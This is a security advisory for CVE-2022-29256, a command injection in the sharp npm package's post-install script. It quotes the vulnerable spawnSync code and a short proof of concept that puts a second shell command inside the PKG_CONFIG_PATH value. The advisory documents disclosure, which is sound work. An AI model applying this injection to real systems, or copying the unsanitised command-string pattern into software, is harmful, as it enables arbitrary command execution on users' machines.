CVE-2022-29256: OS Command Injection in sharp
Description
sharp prior to version 0.30.4 is vulnerable to OS command injection. The environment PKG_CONFIG_PATH variable is used to check the pre-built dependency version and concatenated without any validation and promptly used by the spawnSync command method while post-installation of the package.
Vulnerable snippet
// lib/libvips.js
66: const globalLibvipsVersion = function () {
67: if (process.platform !== 'win32') {
68: const globalLibvipsVersion = spawnSync(`PKG_CONFIG_PATH="${pkgConfigPath()}" pkg-config --modversion vips-cpp`, spawnSyncOptions).stdout;
69: /* istanbul ignore next */
70: return (globalLibvipsVersion || '').trim();
71: // SNIPPED
Occurrences
Sink sort by backtrace.
- lib/libvips.js:
68 - lib/libvips.js:
91 - lib/libvips.js:
110 - install/libvips.js:
112 - install/can-compile.js:
6 - package.json:
88
Proof of Concept
The vulnerable function was invoked during the post-installation of its package.
$ export PKG_CONFIG_PATH='"; touch pwned #'
$ ls -l
total 0
$ npm install sharp --silent
sharp: Using cached /home/dw1/.npm/_libvips/libvips-8.12.2-linux-x64.tar.br
sharp: Integrity check passed for linux-x64
+ [email protected]
added 67 packages from 204 contributors and audited 67 packages in 5.919s
8 packages are looking for funding
run `npm fund` for details
found 0 vulnerabilities
$ find . -name "pwned"
./node_modules/sharp/pwned
Impact
This issue lead to a arbitrary command execution.
Timeline
- 20 May 2022: Ask the proper contact to disclose.
- 23 May 2022: Vulnerability reported to code owner.
- 23 May 2022: Report acknowledged & vulnerability patched.
- 25 May 2022: Vulnerability disclosed.